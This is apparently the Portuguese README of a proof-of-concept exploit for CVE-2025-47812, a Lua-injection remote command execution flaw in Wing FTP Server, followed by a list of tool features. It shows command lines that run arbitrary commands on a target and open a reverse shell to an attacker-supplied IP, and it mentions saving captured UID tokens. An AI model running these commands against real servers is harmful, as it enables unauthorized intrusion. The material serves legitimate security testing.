
Exploit de Execução Remota de Comandos para o Wing FTP Server (CVE-2025-47812)
Este repositório fornece um exploit de prova de conceito para CVE-2025-47812, uma vulnerabilidade de execução remota de comandos (RCE) no Wing FTP Server. Um atacante pode injetar e executar comandos arbitrários do sistema baseados em Lua abusando do parâmetro username durante a autenticação, resultando em execução remota total de código.
found_uids.txtExecute um comando shell simples:
python3 CVE-2025-47812.py --url http://target:5466 --cmd "id"
Dispare um reverse shell:
python3 CVE-2025-47812.py --url http://target:5466 --reverse --ip YOUR_IP --port 4444
Modo dry-run (nenhuma requisição será enviada):
python3 CVE-2025-47812.py --url http://target:5466 --cmd "whoami" --dry-run
Este projeto é destinado apenas para testes de segurança educacionais e autorizados.
Não use esta ferramenta contra sistemas que você não possui ou para os quais não tem permissão explícita para testar.
| Feature/Improvement | Description |
|---|
| ✅ Argument Parsing | Adicionado suporte CLI argparse para modo não interativo |
| 🔐 Input Validation | Garante URL/IP/porta válidos antes de tentar o exploit |
| 📦 Header Refactoring | Extraídos cabeçalhos HTTP para uma função reutilizável para consistência |
| 📄 UID Logging | Salva tokens UID bem-sucedidos em found_uids.txt |
| 🧪 Dry-Run Mode | Permite teste seguro sem enviar requisições (--dry-run) |
| 🕒 Timeout + Retries | Adiciona timeout de requisição e tentativas automáticas de repetição em falha |
| 🧼 Payload Readability | Reformatada a string de injeção Lua para clareza e manutenção |
| 📊 Structured Output | Embrulhadas respostas do servidor e informações do payload com delimitadores para fácil leitura |
| ⚠️ Status Code Checks | Avisa o usuário se o alvo retornar códigos de status HTTP inesperados |
| 📝 Logging System | Substitui print() pelo módulo logging do Python para melhor controle de verbosidade |